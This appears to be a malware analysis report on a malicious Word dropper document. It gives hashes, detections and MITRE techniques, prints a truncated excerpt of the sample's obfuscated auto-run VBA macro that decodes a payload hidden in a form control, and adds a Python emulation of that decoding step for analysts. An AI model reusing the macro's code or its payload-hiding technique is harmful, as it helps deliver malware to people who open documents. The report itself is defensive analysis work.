Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4de77bbfd848a3d8…

MALICIOUS

Office (OLE)

Size: 181.5 KB
Created: 2017-12-05 15:14:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 2853470c8acf318d7022b24af9142400
SHA-1: 2e5d55bb2aef42a928c9d6b7573a8c3527b0cb02
SHA-256: 4de77bbfd848a3d8f858994d817c4b6f9a40638316cacc4768e9cff892017997
Risk score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the sample as malicious with the signature Doc.Dropper.Agent-6391453-0. The document carries VBA macros, including a Document_Open auto-execution macro, so the code runs as soon as the document is opened with macros enabled; this is a common initial-execution technique. The decoded source is heavily obfuscated: dictionary-word identifiers, dead arithmetic, and Pmt calls whose results are discarded as filler. Under the noise, Sub sublimi reads a string from a UserForm control (cystoplegia.vasoconstriction.SelectedItem.Name), keeps its last 7844 characters (91 - 6 + 7759) and passes it to hygrocybe, which converts it to bytes with StrConv(..., 128) (vbFromUnicode) and subtracts 4 (vbKeyShift - 12) from even-indexed bytes and 3 from odd-indexed bytes before further processing; conditional-compilation branches on Win64 choose Long or LongPtr variables, so the code is prepared for both 32-bit and 64-bit Office. Together with the shell/download/object-execution tokens found in the compiled p-code stream, this is consistent with a dropper that decodes and runs a further stage.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6391453-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6391453-0
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro, which Word runs automatically when the document is opened with macros enabled
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code / performance cache) stream contains an auto-execution token together with shell, download or object-execution tokens. Because the check runs on the compiled stream rather than on the source, it still fires for p-code-only (VBA-stomped) documents and for documents where source extraction fails and no readable source is available.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    All five are XML namespace identifiers (Adobe XMP, RDF and DrawingML schemas) from embedded metadata and drawing parts, not download or command-and-control addresses; whatever network destination the macro uses, if any, is not among them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 40809 bytes
SHA-256: 65bd945689a909d7c4432380bb8ffa6d376c5ac0fbe876e6add677ddc1090dc5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub sublimi()
Dim disguisement As Variant
Dim daily As Byte
cystoplegia.vasoconstriction.Value = Day(#12/5/2013#)
varday = fanaloka = "sled"
calculated = "allowances"
lodging = "millerite"
logy = sawyer
accidentally = "skagit"

vacuous = "acromyotonia"
eke = "glyster"
madwoman = fastening
Set barelegged = cystoplegia.vasoconstriction.SelectedItem
those = 37 + 58
 Pmt 0, those, 7669, 34596, 4

undeviating = barelegged.Name
disregarding = 91 - 6 + 7759
estuary = Right(undeviating, disregarding)
elaeis = hygrocybe(estuary)
econometrician = 2 + 16
 Pmt 0, econometrician, 39088, 41223, 7

nineteen = "cookout"
#If (21 - 2 + 381 + 116 - 121 + 305) > ((38 - 77 + 359) - (7 - 72 + 605) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim caroling As Byte
Dim mounts As Long
Dim cutcherry As Byte
Dim unkindness As Long
Dim crupper As Long
authoritatively = 43 - 23 + 761
Dim hyetography As Long
Dim oriental As Long
adoptable = authoritatively + 3459
#ElseIf (21 - 2 + 381 + 116 - 121 + 305) > ((38 - 77 + 359) - (7 - 72 + 605) * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim fewness As Variant
Dim unkindness As LongPtr
Dim mounts As LongPtr
Dim linelike As Variant
Dim affable As Integer
Dim crupper As LongPtr
Dim hyetography As LongPtr
Dim oriental As LongPtr
adoptable = 115 - 105 + 2054
#End If
merino = 126 - 125 - 1
orange = "champak"
phantom = "disquisition"
nt = 92 - 70 + 4074
biconvex = 38 + 30
 Pmt 0, biconvex, 7814, 15957, 6

psittaciformes = "disproportion"
nobleness = "stolidity"
comprador = sweating
outstroke = sante
modue = 7 + 57
 Pmt 0, modue, 16353, 22028, 6

brine = elaeis
ovum = arrack
unkindness = misgovernment(brine)
alphanumeric = "facilitate"
misinformaton = "acidimetric"
Dim enjoyableness As Integer
Dim facultative As Long
crupper = 1 - 81 + 80
mounts = unkindness + adoptable
hyetography = 61 - 11 + 201477
oriental = 29 - 38 + 3509
iccusion = calisaya(hyetography, _
crupper, mounts, _
crupper, crupper, _
crupper, crupper)
formation = 52 + 10
 Pmt 0, formation, 27781, 26134, 8

End Sub

Function hygrocybe(dig) As String
Dim inani() As Byte
Dim continence(6962) As Byte
Dim disloyally(63) As Long
Dim anarchist As Long
Dim fluorescent As Long
Dim cogent(63) As Long
Dim afflicting(63) As Long
Dim seppuku As String
Dim bin As Long
labors = Rnd(190)

Dim nuke As Long
phonologist = 78 - 23 + 200
mouthwatering = 68 - 9 + 197
fleurs = 32 - 15 + 65263
nourish = 72 - 123 + 262195
nepa = 25 - 99 + 16711754
friendliness = 24 - 51 + 91
Dim eurodollar As Variant

flow = 70 - 97 + 16515099
parfait = 69 - 71 + 4034
Dim helmholtz As Long

aberdeen = 88 - 126 + 101
miscarry = 93 - 108 + 4111
guiser = 89 - 35 + 65482
Dim killick As Byte

pomposity = 67 - 33 + 258014
Dim ressort As String
biotechnology = 19 - 20 + 7844
Dim advantaged() As Byte
advantaged = VBA.StrConv(dig, 120 + 8)
cardiomegaly = 60 + 45
 Pmt 0, cardiomegaly, 4228, 39996, 3

abstruse = 7843
neurotrichus = vbKeyShift - 12
For pelycosaur = 0 To abstruse
If pelycosaur Mod 2 = 0 Then
advantaged(pelycosaur) = advantaged(pelycosaur) - neurotrichus
Else
advantaged(pelycosaur) = advantaged(pelycosaur) - (neurotrichus - 1)
End If
Next pelycosaur
comprendre = 39 + 23
Pmt 0, comprendre, 13943, 40155, 3
matronage = doublecrosser
For fluorescent = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
disloyally(fluorescent) = peaks(fluorescent, friendliness, 41)
afflicting(fluorescent) = peaks(fluorescent, miscarry, 41)
cogent(fluorescent) = peaks(fluorescent, nourish, 41)
Next fluorescent
pitiless = 29 + 21
 Pmt 0, pitiless, 18685, 26052, 6

inani = advantaged
ble = 3 - 83 + 84
citrulline = 20 + 59
 Pmt 0, citrulline, 16340, 37518, 3

adaptability = 8 - 108 + 103
labors = flotat
... (truncated)
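The preview shows the first transform the macro applies to its payload: Sub sublimi keeps the last 7844 characters (91 - 6 + 7759) of a UserForm item name, and hygrocybe converts them with StrConv(..., 128) (vbFromUnicode) and subtracts vbKeyShift - 12 (that is, 4) from even-indexed bytes and 3 from odd-indexed bytes. The following is an added example, not code from the sample or from the report: a Python emulation of that stage so the stage-2 bytes can be recovered from the form control's string without opening the document. The later steps (peaks(), calisaya()) are truncated on the page and are not emulated; the sample item name below is constructed, and treating the ANSI code page as Latin-1 is an assumption.

```python
"""Added example, not from the report or the sample: emulation of the first
payload transform in the extracted macro (Sub sublimi / Function hygrocybe)
so the stage-2 bytes can be recovered without running the document.

The page's VBA does:
  estuary    = Right(<UserForm item name>, 91 - 6 + 7759)  ' last 7844 chars
  advantaged = StrConv(estuary, 120 + 8)                 ' 128 = vbFromUnicode
  For i = 0 To 7843: even i -> byte - (vbKeyShift - 12); odd i -> byte - 3
Later steps (peaks(), calisaya()) are truncated on the page and are not
emulated. ANSI == Latin-1 and the sample input are assumptions."""

TAIL_LEN = 91 - 6 + 7759         # 'disregarding'; loop bound 7843 = TAIL_LEN - 1
VB_KEY_SHIFT = 0x10              # VBA constant vbKeyShift
EVEN_DELTA = VB_KEY_SHIFT - 12   # 'neurotrichus' = 4
ODD_DELTA = EVEN_DELTA - 1       # 3


def decode_stage1(item_name: str, tail_len: int = TAIL_LEN) -> bytes:
    """Right() + StrConv(vbFromUnicode) + alternating subtraction. VBA Byte
    arithmetic does not wrap (a negative result is run-time error 6) and a
    short string hits 'subscript out of range', so fail the same way rather
    than silently masking."""
    tail = item_name[-tail_len:] if tail_len else ""
    if len(tail) < tail_len:
        raise IndexError("item name shorter than the decode loop bound")
    data = bytearray(tail.encode("latin-1"))   # assumption: ANSI == Latin-1
    for i in range(tail_len):
        delta = EVEN_DELTA if i % 2 == 0 else ODD_DELTA
        if data[i] < delta:
            raise OverflowError(f"byte {i} underflows (VBA run-time error 6)")
        data[i] -= delta
    return bytes(data)


def encode_stage1(payload: bytes, junk_prefix: str = "") -> str:
    """Inverse transform, needed here only to build the constructed sample.
    bytearray raises ValueError if a byte would exceed 255."""
    enc = bytearray(payload)
    for i in range(len(enc)):
        enc[i] += EVEN_DELTA if i % 2 == 0 else ODD_DELTA
    return junk_prefix + enc.decode("latin-1")


# Constructed input: the junk in front is discarded by Right(); the tail is
# what the macro decodes. A real case feeds the string from the UserForm
# control (cystoplegia.vasoconstriction.SelectedItem.Name in the sample).
CONSTRUCTED_PAYLOAD = (b"CONSTRUCTED STAGE-2 BYTES FOR THE EXAMPLE; " * 200)[:TAIL_LEN]
CONSTRUCTED_ITEM_NAME = encode_stage1(CONSTRUCTED_PAYLOAD, junk_prefix="Tab1")

if __name__ == "__main__":
    decoded = decode_stage1(CONSTRUCTED_ITEM_NAME)
    print(len(decoded), decoded[:40])
```

Extracting the real input means dumping the UserForm's storage from the OLE file (the control's item name lives in the form's "o" and "f" streams, which olevba does not decode for you) and passing that string to decode_stage1; the output is only the input to the next, truncated stage, so it should be inspected rather than assumed to be a finished executable.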